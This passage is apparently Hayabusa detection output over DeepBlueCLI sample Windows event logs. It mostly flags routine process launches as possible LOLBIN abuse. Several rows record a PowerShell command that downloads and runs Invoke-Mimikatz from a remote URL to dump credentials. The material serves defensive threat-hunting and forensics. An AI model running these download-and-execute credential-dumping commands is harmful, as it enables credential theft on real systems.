Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xdec | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 08:21:38.772 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x42c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 08:21:41.273 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf8c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 08:21:41.456 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf68 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 08:21:52.074 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\ri1rh0d1.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0xb9c | User: IEUser | LID: 0x6590f",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 08:29:34.138 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x674 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 08:29:34.389 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x31c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 08:29:35.564 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\nkjhcxgj.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0xfa0 | User: IEUser | LID: 0x6590f",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 08:36:49.583 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb80 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 08:36:49.699 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xfec | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 08:36:50.791 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\gajrh2ob.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0xcbc | User: IEUser | LID: 0x6590f",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 09:00:02.041 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x430 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 09:11:22.985 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x4b8 | User: IEUser | LID: 0x6593d",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 09:11:22.985 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 09:11:45.826 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd50 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 09:11:45.870 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd70 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 09:11:52.496 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x62c | User: IEUser | LID: 0x6590f",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 09:11:52.496 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 09:14:19.540 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('http://eic.me/17'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x9a4 | User: IEUser | LID: 0x6590f",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 09:14:19.540 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 09:20:41.106 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb80 | User: IEUser | LID: 0x6590f",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 09:20:41.106 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 09:20:56.173 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('http://eic.me/17'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xdb8 | User: IEUser | LID: 0x6590f",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 09:20:56.173 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 10:00:00.931 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xd78 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 10:28:55.331 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x300 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 10:28:55.343 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x59c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 12:38:31.558 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc30 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 12:38:32.423 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x304 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 12:38:32.538 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x370 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 12:38:43.023 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xce4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 12:44:04.646 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x380 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 12:44:04.653 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x7dc | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 21:48:41.680 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x23c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 21:48:42.006 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x9d4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 21:48:42.440 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\makecab.exe"" C:\Windows\Logs\CBS\CbsPersist_20160920124842.log C:\Windows\Logs\CBS\CbsPersist_20160920124842.cab | Path: C:\Windows\System32\makecab.exe | PID: 0x914 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 21:48:42.724 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xfe0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 21:48:46.672 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\wuauclt.exe"" /RunHandlerComServer | Path: C:\Windows\System32\wuauclt.exe | PID: 0x718 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 21:48:54.436 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb70 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 22:07:13.234 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logoff | Path: C:\Windows\System32\gpscript.exe | PID: 0xc20 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 22:07:23.000 +09:00,IE10Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-20 22:07:41.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-20 22:07:43.000 +09:00,IE10Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx 2016-09-20 22:07:44.179 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{F3F72FE3-CF58-4A21-BBED-F596E5AFE5C0} | Path: C:\Windows\System32\dllhost.exe | PID: 0x6e8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 22:07:44.757 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1c0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 22:07:58.039 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x9a0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 22:07:58.101 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logon | Path: C:\Windows\System32\gpscript.exe | PID: 0xa00 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 22:07:59.540 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb84 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 22:08:00.110 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Wallpaper\autologon.bat"" "" | Path: C:\Windows\System32\cmd.exe | PID: 0xc1c | User: IEUser | LID: 0x6793c",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 22:08:00.615 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\wallpaper\bginfo.exe C:\wallpaper\bgconfig.bgi /timer:0 | Path: C:\Wallpaper\Bginfo.exe | PID: 0xc38 | User: IEUser | LID: 0x6793c,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 22:08:01.982 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc5c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 22:10:32.160 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\wuauclt.exe"" /RunHandlerComServer | Path: C:\Windows\System32\wuauclt.exe | PID: 0x3a0 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 22:20:59.082 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\RunDll32.exe"" ""C:\Windows\system32\WerConCpl.dll"", LaunchErcApp -responsepester | Path: C:\Windows\System32\rundll32.exe | PID: 0x87c | User: IEUser | LID: 0x6796c",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 22:25:15.535 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0xa00 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 23:02:21.413 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x11c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 23:02:21.475 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x720 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 23:03:25.976 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x824 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 23:03:26.007 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x6b4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 23:54:49.500 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe /d acproxy.dll,PerformAutochkOperations | Path: C:\Windows\System32\rundll32.exe | PID: 0xc60 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-21 00:10:43.213 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x72c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-21 00:10:56.112 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe88 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-21 00:10:56.268 +09:00,IE10Win7,4688,low,,Suspicious Cmd 